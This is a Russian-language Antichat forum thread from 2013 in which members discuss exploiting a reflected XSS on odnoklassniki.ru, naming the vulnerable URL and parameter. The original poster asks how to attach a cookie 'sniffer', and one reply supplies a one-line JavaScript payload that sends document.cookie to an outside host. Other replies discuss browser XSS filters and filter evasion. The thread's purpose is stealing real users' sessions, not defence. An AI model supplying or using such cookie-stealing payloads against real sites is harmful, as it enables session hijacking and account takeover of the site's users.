HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу Пассивная XSS odnoklassniki.ru
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.01.2013, 08:16
DavidRog
Guest
Сообщений: n/a
Провел на форуме:
1804

Репутация: 10
По умолчанию
Из соседней темы, взял эту пассивку.

Цитата:
Сообщение от _Spamer_  
_Spamer_ said:
Пассивная XSS odnoklassniki.ru
https://cards2.odnoklassniki.ru/index.html?ServiceDescr=XSS
Подставляя такое:

или

click me!

вылазит алерт.

Вопрос.. а как снифер сюда прикрутить ?
 
Ответить с цитированием

  #2  
Старый 15.01.2013, 12:39
йож
Guest
Сообщений: n/a
Провел на форуме:
12610

Репутация: 0
По умолчанию
img = new Image(); img.src = "http://sniffer.ru/evil.gif?"+document.cookie;
 
Ответить с цитированием

  #3  
Старый 15.01.2013, 13:54
DavidRog
Guest
Сообщений: n/a
Провел на форуме:
1804

Репутация: 10
По умолчанию
Цитата:
Сообщение от йож  
йож said:

img = new Image(); img.src = "http://sniffer.ru/evil.gif?"+document.cookie;

Ну дело в том, что если подставлять alert(/xss/), то алерт не вылетает.. соответственно и на снифер нечего не приходит..
 
Ответить с цитированием

  #4  
Старый 15.01.2013, 13:59
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию
Цитата:
Сообщение от DavidRog  
DavidRog said:
Ну дело в том, что если подставлять alert(/xss/), то алерт не вылетает.. соответственно и на снифер нечего не приходит..
Ты про обход фильтров что нибудь слышал?
 
Ответить с цитированием

  #5  
Старый 15.01.2013, 13:59
justonline
Guest
Сообщений: n/a
Провел на форуме:
179355

Репутация: 53
По умолчанию
Цитата:
Сообщение от DavidRog  
DavidRog said:
Ну дело в том, что если подставлять alert(/xss/), то алерт не вылетает.. соответственно и на снифер нечего не приходит..
хром и ие фильтруют пассивки
 
Ответить с цитированием

  #6  
Старый 15.01.2013, 13:59
йож
Guest
Сообщений: n/a
Провел на форуме:
12610

Репутация: 0
По умолчанию
какой браузер?
 
Ответить с цитированием

  #7  
Старый 15.01.2013, 14:10
DavidRog
Guest
Сообщений: n/a
Провел на форуме:
1804

Репутация: 10
По умолчанию
Цитата:
Сообщение от йож  
йож said:
какой браузер?
пробовал через FF и CHROME.

вот так alert(/xss/) в коде хтмл вроде все ровно, но алерт не вылазит.

пару лет назад все получалось, а щас нет.

подумал просто что есть какой-то вариант не в теги выполнять произвольный код. а например в
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ